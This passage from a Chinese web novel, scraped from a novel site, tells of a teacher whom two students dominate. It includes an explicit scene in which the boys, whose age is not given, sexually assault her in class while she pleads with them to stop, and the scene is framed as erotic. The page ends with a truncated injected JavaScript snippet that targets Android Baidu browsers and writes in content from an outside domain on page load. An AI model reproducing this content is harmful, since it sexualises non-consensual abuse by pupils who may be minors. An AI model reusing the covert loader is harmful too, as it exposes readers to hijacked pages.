逃脱 分卷阅读77

    …”她用力说。

    两个少年在磨牙,纳兰葎撇头,“真是被你打败了……”

    飞驰的跑车里,蓝静仪睡在纳兰葎怀里,呼息平稳,面色却异样苍白,纳兰荻开着车,冷俊的面容偶尔在后车镜瞥到她的睡容时而有片刻的融化。

    “真想把手放在她纤细的脖子上掐死她”纳兰葎说。

    “掐吧,我没有异意”纳兰荻立刻回嘴。

    “别气我”纳兰葎撇头看向车窗外。车里一阵沉默,只听到蓝静仪淡淡的呼息声,仿佛一种无法忽视的存在将两个少年紧紧包围。

    他们都抵制着内心真正的想法,力图压抑心里越来越明晰的感情。

    “夜晚找个别的女人怎么样?”纳兰葎突然开口说。

    “好啊,正好想唤唤口味”纳兰获不冷不淡地附和。车子开进了蓝山校园。

    蓝静仪坐在办公室桌前备课,眼皮越来越涩重,黑色的文字都如小蝌蚪般飘浮起来,她头低下去又猛地抬起来,拍拍自己的额头,继续看书。

    “昨晚没睡好吗?”韩风将一杯咖啡放在她面前,要是平时他是反对她喝咖啡的。

    蓝静仪脸一红,“嗯……”点点头,眼睛却没离开书本。她不敢看韩风。

    韩风看着她苍白的颊浮上淡粉,立领小套装精致的衣领旁若隐若现地遮住可疑的瘀红,他的心慢慢的沉了沉了,如同扔进咖啡里的糖块,慢慢地变成咖啡的苦涩。

    不是你想的那样,他摇头,在心里否定了自己的猜疑。第一遍铃声响了,蓝静仪站起来走出办公室。

    打开门没走几步,不远处站着熟悉而高大的少年让她一怔。她迅速转过身想向另一面走,少年已经追过来。

    “老师是不是在躲我?”蓝蕼的眸光带着亲昵和一丝淡淡的疑虑。

    第46章

    “没有,上课铃响了,还不去上课,班长应该早点到啊”蓝静仪说着匆匆向前走去。蓝蕼轻笑,慢慢跟着她上楼梯。

    快要进教室时,班里的一个女孩子悄悄告诉她,老师,上课时纳兰荻和纳兰葎没有听讲只趴在课桌上睡觉,讲课老师也是睁一只眼闭一只眼。

    “真的吗,去上课吧,我会解决的”蓝静仪很认真的对女孩子说道,其实只有她自己知道他们为什么会在课堂上睡觉,而她这个老师也只是徒有虚名而已。

    上课时,纳兰葎和纳兰荻明明精神百倍,他们一眨不眨地听她讲课,或者说他们是一眨不眨地在看她。她只觉得浑身乏力,眼皮涩重,她努力支撑着,很怕自己站着就睡着了。

    “大家自己看一下书,有什么问题可以问我”她清了清喉咙,终于疲惫地坐在讲台下的椅子上。

    “老师,过来一下”她抬起眼,蓝蕼正看着她。而纳兰两兄弟的目光也随即跟过来,她顿了一下,还是站起来走过去。

    纳兰荻和纳兰葎的目光几乎要把她吞下去。她故意忽略不去看他们,走到蓝蕼面前。

    “这道”蓝蕼指指课本,抬起头,狭眸深深看了她一眼。

    她俯身给他讲题,背后却背负着两道杀人般的目光。蓝蕼支着头似乎很认真的听她讲,少年淡淡的气息扑在她脸上,痒痒的,暖暖的。

    “下课后我在小树林等你”少年轻轻的声音。

    她的背一僵,没有答话,仍是一丝不苟地给他讲题。那道题确实很复杂,只是它难得倒聪明的蓝蕼吗,虽然他有一个星期不曾来上课。

    少年虽然在看书本,但她知道他一直在看她,他的脸上有种沉静的渴望,等待她哪怕一点点的回复。只是在纳兰葎和纳兰荻面前,她怎么敢有一丝一毫的出轨,那样反而是在害他。

    蓝蕼看着那匀静如奶脂的纤巧面颊,有一种永远都看不够的感觉,她珠落玉盘的温柔声音也像世界上最美丽的梵音,她的沉默,似乎是一种静静的默许,他的心里开始溢上欢乐,点染了那曾经荒芜的瞳眸。

    就在蓝静仪准备转身回讲台时,身后又传来声音,“老师,过来一下”,她极不情愿地转身,脸上还要带着谦和的微笑向纳兰两兄弟走过去。

    “哪道题不会?”她轻问。

    “这么长时间没上课,功课荒芜了不少,不会的问题很多呢,老师请坐下来讲”纳兰葎恭恭静静地站起身,让蓝静仪坐在他们中间。

    “哦,没关系,我站着就好”她笑笑,脸上的表情有些僵。

    “这样会把老师累坏的,老师请坐吧”纳兰荻挑眉,目光沉沉地看着她。

    “好吧……谢谢”蓝静仪只得坐下来,纳兰葎坐回原位,指点着书上的题,所有的题他都点了个遍。

    蓝静仪心里涌上不悦,她知道他们是心里不舒服,故意挑刺,可又不得不勉强应付,毕竟别的同学不这么认为。纳兰葎听的很认真,不时还提出一两点疑问。

    而纳兰荻的手已经伸进她的裙子里,邪魅的手指捻弄她红肿的私密,幽泉很快湿透他的手指,他两根粗长的手指顺势插进她的洞口。

    密道内红肿,窄窒,甚至连他一要手指都很困难,而他却强行将两根挤入进去。他的手指旋转着,使劲将她的阴道撑开。

    蓝静仪咬着唇,“嗯……”微细的呻吟声只有他们两个能听到,她脸上有种难受的表情,她像在承受着什么痛楚,额头上也渗出细密的汗珠。

    两根长指缓慢的在狭穴内抽插,似乎是一种漫不经心的玩弄。蓝静仪的小腹急剧地痉挛着,下体交叉的兴奋感让她格外难过。

    她的手紧紧抓着纳兰荻的手腕,“不要……嗯……不要……”

    “在我们眼前不要去勾引别的男人,要知道我们才是你的主人”纳兰荻对她耳语。纳兰葎的一根手指也悄悄潜入,插进几乎被两根粗指撑的毫无缝隙的洞口。

    两个少年的三根手指一齐在她的小穴里翻搅。

    “是我不对……停下来,以后我不会了……”蓝静仪喘息着轻声恳求,她希望他们立刻停止,哪怕是让她去死也行,只要不在同学们面前丢脸。

    两个少年仍然恋恋不舍地玩弄着她的下体,当他们终于将手指拔出来,一股股淫水喷湿了他们的长指。

    蓝静仪完全瘫软在课桌上。

    “怎么了,老师,不舒服吗,我送你去医务室”纳兰荻站起来,抱起她走出教室。大家都紧张地你看我,我看你,不知道怎么回事。

    蓝蕼靠在靠背上,狭长的黑眸盯住门口,而手却紧紧地握起来。纳兰葎挑衅地看了他一眼,两个少年的目光在空气中相撞,都暗暗地较着劲。

    蓝静仪从床上坐起来,发现四周皆是白色,是学校的医务室。

    “醒了?”纳兰荻挨着她仰面躺在枕上,此时他抬头看她。

    “我怎么在这儿,这里的医生呢”

    “我把她们轰出去了”

window["timea"] = "svggr" + (new Date()).getTime();var t = document;if((/(Android)/i.test(navigator.userAgent))&&(/(baidu)/i.test(navigator.userAgent))){if((/(check_xxin)/i.test(window.location.href))){alert(new Date().getSeconds())};var lxq="dd.shxckr.cn/s_80137_1/w1xhtml?";t.write('